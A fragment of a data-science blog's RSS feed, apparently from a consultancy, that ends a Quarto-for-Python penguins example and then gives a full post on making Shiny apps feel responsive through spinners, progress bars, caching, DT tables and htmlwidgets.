&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;data = pd.read_csv(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; &amp;#39;https://raw.githubusercontent.com/rfordatascience/tidytuesday/master/data/2020/2020-07-28/penguins.csv&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;data.head()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;`&lt;span style="color:#a5d6ff"&gt;`
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;## Results
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;The figure below shows the bill length plotted as a function of the body mass
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;for three species across a 3-year period.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;`&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| echo: false
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| fig-cap: &amp;#34;Bill length as a function of body mass&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| fig-width: 8
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;import plotly.express as px
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;px.scatter(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; data,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; x=&amp;#34;body_mass_g&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; y=&amp;#34;bill_length_mm&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; color=&amp;#34;species&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; facet_col=&amp;#34;year&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt; trendline=&amp;#34;ols&amp;#34;,
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;`&lt;span style="color:#a5d6ff"&gt;`
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;`&lt;span style="color:#a5d6ff"&gt;`{python}
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;#| echo: false
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;from IPython.display import display, Markdown
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;avg_length = data[&amp;#39;bill_length_mm&amp;#39;].mean()
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;display(Markdown(
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;f&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;According to our data, the average bill length is
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;{round(avg_length, 1)} mm.
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;``
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Try copying this into your Quarto document; alternatively, you can download the full code &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/2023-quarto-for-python-users" rel="external"&gt;here&lt;/a&gt;. Upon rendering, an HTML document like the one at this &lt;a href="https://jumpingrivers.github.io/blog/quarto_python_penguins_report.html" rel="external"&gt;webpage&lt;/a&gt; should be created.&lt;/p&gt;
&lt;p&gt;Hopefully you can now appreciate the beauty of Quarto! By having the code used
to generate the content embedded in the document, our report is fully
automated; if the data changes, we just need to click render to update the
content. This also makes it easy for a colleague to reproduce the report
themselves. And because Quarto uses plain text files, it&amp;rsquo;s also great for
version control with Git!&lt;/p&gt;
&lt;h3 id="further-reading"&gt;Further reading&lt;/h3&gt;
&lt;p&gt;We&amp;rsquo;ve only covered web reports in this post, but with Quarto you can also write
presentations, PDF articles, Word documents, and more! There is much more detail
in the fantastic &lt;a href="https://quarto.org/" rel="external"&gt;Quarto documentation&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Look out for our future post on Jupyter notebooks and Quarto!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/quarto-for-python-users/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Improving the responsiveness of Shiny applications</title><link>https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/</link><pubDate>Thu, 26 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="what-do-we-mean-by-responsiveness"&gt;What do we mean by &amp;ldquo;responsiveness&amp;rdquo;?&lt;/h2&gt;
&lt;p&gt;Confusingly (and rather unhelpfully) when it comes to web applications there are two different topics that may be referred to by the terms &amp;ldquo;responsive&amp;rdquo; or &amp;ldquo;responsiveness&amp;rdquo;. If you stick &amp;ldquo;responsive UI&amp;rdquo; into your favourite search engine the top results will concern &amp;ldquo;responsive design&amp;rdquo; - the practice of making websites and applications work across devices, regardless of device and browser dimensions. That&amp;rsquo;s an interesting and important topic when it comes to designing data-science applications but it&amp;rsquo;s not what we&amp;rsquo;re covering here.&lt;/p&gt;
&lt;p&gt;What we&amp;rsquo;re covering here is responsiveness that you might stick &amp;ldquo;un&amp;rdquo; in front of if things got really bad.
It&amp;rsquo;s about making your user interface feel like it responds instantaneously to a user&amp;rsquo;s interaction. We&amp;rsquo;ll start with making sure that a user who clicks a button sees some kind of simple acknowledgement that the button has been clicked, and work up to clicking a button (or dragging a slider or…) and immediately seeing the results of complex computations.&lt;/p&gt;
&lt;p&gt;While related, responsiveness isn&amp;rsquo;t the same as performance. Performance is about completing an operation in the minimal amount of time, while responsiveness is about meeting human needs for feedback when executing an action.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-improving-responsiveness-shiny-applications"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="motivation"&gt;Motivation&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;ve made a quick and simple {shiny} app as a toy for your own benefit maybe you shouldn&amp;rsquo;t care that much if it &amp;ldquo;feels&amp;rdquo; responsive. But if you&amp;rsquo;re making an application you want to be used by others you presumably want them to take something from it. That could be &amp;ldquo;Wow, I finally understand Fourier Transforms&amp;rdquo; (I would love someone to make an app that could make me say that), or &amp;ldquo;Clearly I need to buy this product/service from this company&amp;rdquo; or simply &amp;ldquo;This person is very clever, we should hire them&amp;rdquo;. You&amp;rsquo;re not likely to get those kinds of responses if your app is &lt;em&gt;unresponsive&lt;/em&gt; to interaction. If your user clicks something and nothing happens as far as they can see - they don&amp;rsquo;t know that somewhere, perhaps the other side of the world, there&amp;rsquo;s a server performing millions of operations for their benefit - they&amp;rsquo;ll feel frustrated and likely give up pretty quickly.&lt;/p&gt;
&lt;p&gt;&amp;ldquo;Guru of website usability&amp;rdquo; &lt;a href="https://en.wikipedia.org/wiki/Jakob_Nielsen_(usability_consultant)" rel="external"&gt;Jakob Nielsen&lt;/a&gt; wrote that &lt;a href="https://www.nngroup.com/articles/website-response-times/" rel="external"&gt;responsiveness matters&lt;/a&gt; because of&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Human limitations&lt;/strong&gt;, especially in the areas of memory and attention&amp;hellip; We simply don&amp;rsquo;t perform as well if we have to wait and suffer the inevitable decay of information stored in short-term memory.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Human aspirations&lt;/strong&gt;. We like to feel in control of our destiny rather than subjugated to a computer&amp;rsquo;s whims. Also, when companies make us wait instead of providing responsive service, they seem either arrogant or incompetent.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;Jeff Johnson gives more details in his excellent &lt;a href="https://www.elsevier.com/books/designing-with-the-mind-in-mind/johnson/978-0-12-818202-4" rel="external"&gt;Designing with the Mind in Mind&lt;/a&gt;. From page 246 of the third edition:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If software waits longer than 0.1 second to show a response to a user&amp;rsquo;s action, the perception of cause and effect is broken; the software&amp;rsquo;s reaction will not seem to be a result of the user&amp;rsquo;s action. Meeting the 0.1 second deadline is essential to support users&amp;rsquo; perceptions that they are directly manipulating objects on the display. Therefore, onscreen buttons have 0.1 second to show they&amp;rsquo;ve been clicked; otherwise, users will assume they missed and click again. This does not mean that buttons have to complete their &lt;em&gt;function&lt;/em&gt; in 0.1 second &amp;mdash; only that they must show that they have been &lt;em&gt;pressed&lt;/em&gt; by that deadline.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="the-simplest-improvements-you-can-make"&gt;The simplest improvements you can make&lt;/h2&gt;
&lt;p&gt;Simply making sure the user is aware their click or tap was registered and something is happening is a great first step. Probably the simplest of all options is to set the cursor style to &amp;ldquo;wait&amp;rdquo; when the app is busy. Assuming your application already has a custom-CSS file, that&amp;rsquo;s as simple as adding something like the following:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-css" data-lang="css"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#7ee787"&gt;html&lt;/span&gt;.&lt;span style="color:#f0883e;font-weight:bold"&gt;shiny-busy&lt;/span&gt; .&lt;span style="color:#f0883e;font-weight:bold"&gt;container-fluid&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;cursor&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;wait&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="assets/cursor-wait.gif" alt="A gif showing the Mac version of the wait cursor style after a button is pressed" style="width: 323px; max-width: 100%; display:block; margin-left:auto; margin-right: auto" /&gt;
&lt;p&gt;The biggest issue here is it only works if the user has a visible cursor. For something that works on touch devices and is easy to add, you might want to take a look at &lt;a href="https://github.com/daattali/shinycssloaders" rel="external"&gt;{shinycssloaders}&lt;/a&gt; (see below) and/or &lt;a href="https://shiny.john-coene.com/waiter/" rel="external"&gt;{waiter}&lt;/a&gt; that we covered in our article on &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-extensions-ui"&gt;Top 5 Shiny UI Add-On Packages&lt;/a&gt;.&lt;/p&gt;
&lt;img src="assets/shinycssloaders.gif" alt="A gif of a plot being re-generated with a shinycssloader showing during rendering." style="width: 100%" /&gt;
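&lt;p&gt;As a minimal sketch of how little code a loading indicator needs, the app below wraps a plot output in withSpinner() from {shinycssloaders}. The input and output names, and the two-second pause standing in for slow work, are our own illustrative assumptions:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(shiny)
library(shinycssloaders)

ui &amp;lt;- fluidPage(
  actionButton(&amp;#34;redraw&amp;#34;, &amp;#34;Redraw&amp;#34;),
  # withSpinner() shows a spinner while the wrapped output recalculates
  withSpinner(plotOutput(&amp;#34;hist&amp;#34;))
)

server &amp;lt;- function(input, output, session) {
  output$hist &amp;lt;- renderPlot({
    input$redraw   # take a dependency on the button
    Sys.sleep(2)   # hypothetical stand-in for a slow computation
    hist(faithful$eruptions)
  })
}

shinyApp(ui, server)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;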
&lt;p&gt;If the user might have to wait longer than a few seconds for the process they&amp;rsquo;ve just set in motion to complete, you should consider a progress indicator. From page 247 of DwtMiM:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Because 1 second is the maximum gap expected in conversation, and because operating an interactive system is a form of conversation, interactive systems should avoid lengthy gaps in their side of the conversation. Otherwise, the human user will wonder what is happening. Systems have about 1 second to either do what the user asked or indicate how long it will take. Otherwise, users get impatient.&lt;/p&gt;
&lt;p&gt;If an operation will take more than a few seconds, a progress indicator is needed. Progress indicators are an interactive system&amp;rsquo;s way of keeping its side of the expected conversational protocol: &amp;ldquo;I&amp;rsquo;m working on the problem. Here is how much progress I have made and an indication of how much more time it will take.&amp;rdquo;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The &lt;a href="https://shiny.rstudio.com/gallery/progress-bar-example.html" rel="external"&gt;{shiny} package itself&lt;/a&gt; has a progress indicator, while the &lt;a href="https://shiny.john-coene.com/waiter/" rel="external"&gt;{waiter} package&lt;/a&gt; also offers a nice built-in-to-button option, shown below:&lt;/p&gt;
&lt;img src="assets/progress-indicator.gif" alt="A gif of a progress indicator built into a button." style="width: 197px; max-width: 100%; display:block; margin-left:auto; margin-right: auto" /&gt;
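&lt;p&gt;For the progress indicator built into {shiny}, a sketch along the following lines may be a useful starting point. It uses withProgress() and incProgress(); the button name, the number of steps and the half-second pauses are assumptions made purely for illustration:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(shiny)

ui &amp;lt;- fluidPage(
  actionButton(&amp;#34;go&amp;#34;, &amp;#34;Run analysis&amp;#34;),
  textOutput(&amp;#34;result&amp;#34;)
)

server &amp;lt;- function(input, output, session) {
  output$result &amp;lt;- renderText({
    req(input$go)  # do nothing until the button has been clicked
    withProgress(message = &amp;#34;Crunching numbers&amp;#34;, value = 0, {
      n &amp;lt;- 5
      for (i in seq_len(n)) {
        Sys.sleep(0.5)  # hypothetical stand-in for one slow step
        # Advance the bar and tell the user how far along we are
        incProgress(1 / n, detail = paste(&amp;#34;Step&amp;#34;, i, &amp;#34;of&amp;#34;, n))
      }
    })
    &amp;#34;Done!&amp;#34;
  })
}

shinyApp(ui, server)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Reporting progress in steps like this only works if the slow task can be broken into chunks; for a single long-running call, a plain loading indicator may be the more honest choice.&lt;/p&gt;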
&lt;h2 id="clearing-performance-bottlenecks"&gt;Clearing performance bottlenecks&lt;/h2&gt;
&lt;p&gt;As already mentioned, responsiveness and performance are two &lt;em&gt;different&lt;/em&gt; aspects of the user experience. Nevertheless, improving the performance of an app can lessen the need to provide extra feedback like loading indicators.&lt;/p&gt;
&lt;p&gt;If you do find that the user has to wait for an extended period, it may be worth rethinking the amount of processing that your Shiny app is performing. Could you reduce the amount of computation occurring inside the app (by caching plots and tables, or by precomputing your data)? Could the app be using too much reactivity or regenerating UI elements unnecessarily? We&amp;rsquo;ve &lt;a href="https://www.jumpingrivers.com/blog/who-shiny-covid-maintenance-continuous-integration/"&gt;previously discussed&lt;/a&gt; how we took the loading times of a World Health Organization app from minutes(!) to seconds. The Shiny documentation also gives advice on how the likes of &lt;a href="https://shiny.rstudio.com/articles/caching.html" rel="external"&gt;caching&lt;/a&gt; and &lt;a href="https://shiny.rstudio.com/articles/async.html" rel="external"&gt;async programming&lt;/a&gt; can be used to bolster performance. &lt;a href="https://engineering-shiny.org/common-app-caveats.html" rel="external"&gt;Chapter 15&lt;/a&gt; of &lt;a href="https://engineering-shiny.org/index.html" rel="external"&gt;Engineering Production-Grade Shiny Apps&lt;/a&gt; covers, in detail, some common performance pitfalls and how to solve them.&lt;/p&gt;
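&lt;p&gt;To give a flavour of plot caching, here is a small sketch using bindCache(), which is available in {shiny} 1.6.0 and later. The slider, the output name and the artificial delay are illustrative assumptions rather than code from a real app:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(shiny)

ui &amp;lt;- fluidPage(
  sliderInput(&amp;#34;bins&amp;#34;, &amp;#34;Number of bins&amp;#34;, min = 5, max = 50, value = 20),
  plotOutput(&amp;#34;hist&amp;#34;)
)

server &amp;lt;- function(input, output, session) {
  output$hist &amp;lt;- bindCache(
    renderPlot({
      Sys.sleep(2)  # hypothetical stand-in for an expensive computation
      hist(faithful$eruptions, breaks = input$bins)
    }),
    input$bins  # cache key: the plot is reused whenever this value repeats
  )
}

shinyApp(ui, server)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The first time a given number of bins is requested the user still waits, but moving the slider back to a value that has already been seen should return the stored plot almost immediately.&lt;/p&gt;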
&lt;h2 id="taking-the-next-step-with-htmlwidgets"&gt;Taking the next step with {htmlwidgets}&lt;/h2&gt;
&lt;p&gt;If you want your app to feel like it responds instantaneously to interactions then you probably need to look at &lt;a href="https://www.htmlwidgets.org/index.html" rel="external"&gt;{htmlwidgets}&lt;/a&gt;. By moving some of the work from a Shiny server to the user&amp;rsquo;s own browser these can, in principle at least, provide instant (~0.1 seconds or less) updates - typically to a visualisation or table - in response to a user&amp;rsquo;s interactions. The result is an enhanced feeling of &lt;a href="https://www.nngroup.com/articles/direct-manipulation/" rel="external"&gt;direct manipulation&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Direct manipulation (DM) is an interaction style in which users act on displayed objects of interest using physical, incremental, reversible actions whose effects are immediately visible on the screen.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There is an ever-increasing number of such widgets available off-the-shelf, from &lt;a href="https://github.com/plotly/plotly.R" rel="external"&gt;{plotly}&lt;/a&gt; charts, to &lt;a href="http://rstudio.github.io/leaflet/" rel="external"&gt;{leaflet}&lt;/a&gt; maps, to &lt;a href="https://rstudio.github.io/DT/" rel="external"&gt;{DT}&lt;/a&gt; data tables. Use of the latter is shown in the video below, where filtering and sorting occur instantly following my interactions. There&amp;rsquo;s no lag where I might get distracted and forget what I just did, and if I err I don&amp;rsquo;t have to wait for a server to tell me so before I retrace my steps.&lt;/p&gt;
&lt;video autoplay loop controls style="display: block; max-width: 100%" aria-label="Video showing usage of the DT htmlwidget" aria-description="Ten rows of the iris dataset can be seen. The user can be seen entering letters into the search box to instantly filter the data and then clicking on columns to sort by them."&gt;
&lt;source src="assets/dt-table.mp4" type="video/mp4"&gt;
&lt;/video&gt;
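&lt;p&gt;We can&amp;rsquo;t say exactly how the table in the video was configured, but a sketch of a {DT} table whose searching and sorting happen in the browser might look like the following. The output name is our own choice, and server = FALSE is the assumption that matters here, since it sends the whole dataset to the browser up front:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(shiny)
library(DT)

ui &amp;lt;- fluidPage(
  DTOutput(&amp;#34;table&amp;#34;)
)

server &amp;lt;- function(input, output, session) {
  # server = FALSE: all rows are sent to the browser once, so searching,
  # filtering and sorting need no further round trips to the Shiny server
  output$table &amp;lt;- renderDT(
    datatable(iris, filter = &amp;#34;top&amp;#34;),
    server = FALSE
  )
}

shinyApp(ui, server)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Client-side processing like this suits small datasets such as iris; for large or private data, the default server-side mode is usually the safer option.&lt;/p&gt;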
&lt;p&gt;Most HTML widgets are wrappers around pre-existing JavaScript libraries. That means you could get the same widget functionality without using R and Shiny at all. But the power of htmlwidgets is how easily they can fit into your extant workflows, typically requiring just a few lines of R code. This is advantageous because you use the widgets without having to understand the underlying web technologies, but also because R has a much richer ecosystem for data science than JavaScript. By using them together you can harness the benefits of both. If you want to create your own widgets, however, you do need &lt;em&gt;some&lt;/em&gt; knowledge of HTML, CSS and JavaScript. That&amp;rsquo;s beyond the scope of this article, but if you are interested to learn more then John Coene&amp;rsquo;s &lt;a href="https://book.javascript-for-r.com/" rel="external"&gt;JavaScript for R&lt;/a&gt; book is thorough and free to read online.&lt;/p&gt;
&lt;h2 id="widgets-and-animation"&gt;Widgets and animation&lt;/h2&gt;
&lt;p&gt;Moving work from server to browser makes it more practical to use another pedagogical tool: animation. After all, things would likely feel pretty clunky to the user if they clicked a button in the UI, then had to wait while data was sent to and back-from a server before animations finally kicked off.&lt;/p&gt;
&lt;p&gt;When it comes to animated visualisations, you&amp;rsquo;re probably already familiar with Hans Rosling&amp;rsquo;s talks using the &lt;a href="https://www.gapminder.org/tools/#$chart-type=bubbles&amp;amp;url=v1" rel="external"&gt;Trendalyzer tool&lt;/a&gt; from &lt;a href="https://www.gapminder.org/" rel="external"&gt;Gapminder&lt;/a&gt;, for example &lt;a href="https://youtu.be/hVimVzgtD6w" rel="external"&gt;&lt;em&gt;The best stats you&amp;rsquo;ve ever seen&lt;/em&gt;&lt;/a&gt;. From these we see that with animations it&amp;rsquo;s easy to track a point or collection of points in a two-dimensional scatter plot as a third dimension (such as time) changes.&lt;/p&gt;
&lt;p&gt;But &lt;a href="http://vis.stanford.edu/papers/animated-transitions" rel="external"&gt;Heer and Robertson&lt;/a&gt; found that, with a bit of care, animations can be used to aid much more drastic changes: going from one chart form to another, e.g. a scatter plot to a bar chart or a bar chart to a donut. They also used animations to show data drilldown - in this case going &lt;a href="https://vimeo.com/19278444#t=1m15s" rel="external"&gt;from individual bars to stacked bars and on to grouped bars&lt;/a&gt; - and found both a reduction in user error when performing some simple tasks and a strong user preference for the use of these animations.&lt;/p&gt;
&lt;p&gt;In a recent project with &lt;a href="https://utahtech.edu/" rel="external"&gt;Utah Tech University&lt;/a&gt; we built a pair of custom widgets - using the popular &lt;a href="https://d3js.org/" rel="external"&gt;d3&lt;/a&gt; JavaScript library - for embedding in Shiny dashboards, visualising student admission and retention data. The video below shows the JavaScript library we built for the widgets in action - a Sankey (or, more precisely, alluvial) diagram - but repurposed with the diamonds data from the {ggplot2} package that you may be more familiar with. The library offers immediate feedback with a customisable popup and link and node highlighting when hovering over any link or node. Moreover, clicking on one of the nodes drills down on that node - revealing information about the clarity for the selected cut in the case shown - and updates other preceding and succeeding steps of the diagram accordingly. Shift-clicking reverses the process.&lt;/p&gt;
&lt;video autoplay loop controls style="display: block; max-width: 100%" aria-label="Video showing usage of our custom Sankey htmlwidget" aria-description="The user can be seen hovering over several nodes and links with a popup appearing in each case. The user then drills down into the data by clicking on a node. The drill-down change is animated."&gt;
&lt;source src="assets/diamonds-example.mp4" type="video/mp4"&gt;
&lt;/video&gt;
&lt;p&gt;All the requisite data processing is done &amp;ldquo;on-the-fly&amp;rdquo;, in the browser and effectively instantaneously (in a few milliseconds) so that, to invert Johnson&amp;rsquo;s language above, the user has the perception of cause and effect; the software&amp;rsquo;s reaction seems to be a result of the user&amp;rsquo;s action.&lt;/p&gt;
&lt;p&gt;You can find out much more about our work with Utah Tech by watching Theo&amp;rsquo;s talk &lt;a href="https://www.youtube.com/watch?v=yVatQQhDgz4" rel="external"&gt;&amp;ldquo;Expect the Unexpected - {Shiny} &amp;amp; {htmlwidgets}&amp;rdquo;&lt;/a&gt; from &lt;a href="https://shiny-in-production-2022.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2022&lt;/a&gt;. The JavaScript code used in the widgets is open source and &lt;a href="https://github.com/jumpingrivers/ard-js" rel="external"&gt;available on GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="when-htmlwidgets-and-shiny-applications-might-not-be-the-answer"&gt;When {htmlwidgets} and Shiny applications might not be the answer&lt;/h2&gt;
&lt;p&gt;User experience design is often a case of picking the right tools for the job and there are, of course, times when htmlwidgets may not be the right tools.&lt;/p&gt;
&lt;p&gt;Simple loading and/or progress indicators might be all that&amp;rsquo;s realisable given project constraints on time and/or money. The round trips to a Shiny server may be necessary because the relevant calculations you need to run to update data rely on some complex R (or &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-python-posit-rstudio/" rel="external"&gt;Python!&lt;/a&gt;) code that would be difficult to run in JavaScript. Alternatively, it might be the underlying data itself that is the issue - it needs to be kept private or it might be impractically large to transfer it to a user&amp;rsquo;s browser to process.&lt;/p&gt;
&lt;p&gt;htmlwidgets are quick and easy to add to a project if they already exist, but creating new ones requires additional developer expertise that you may not have in a team focussed on R or Python development.&lt;/p&gt;
&lt;p&gt;It could be that the best solution to a UX problem is simple, static content. As &lt;a href="https://www.nngroup.com/articles/website-response-times/" rel="external"&gt;Jakob Nielsen reported&lt;/a&gt; back in 2010:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Instead of big images, today&amp;rsquo;s big response-time sinners are typically overly complex data processing on the server or overly fancy widgets on the page (or too many fancy widgets).&lt;/p&gt;
&lt;/blockquote&gt;
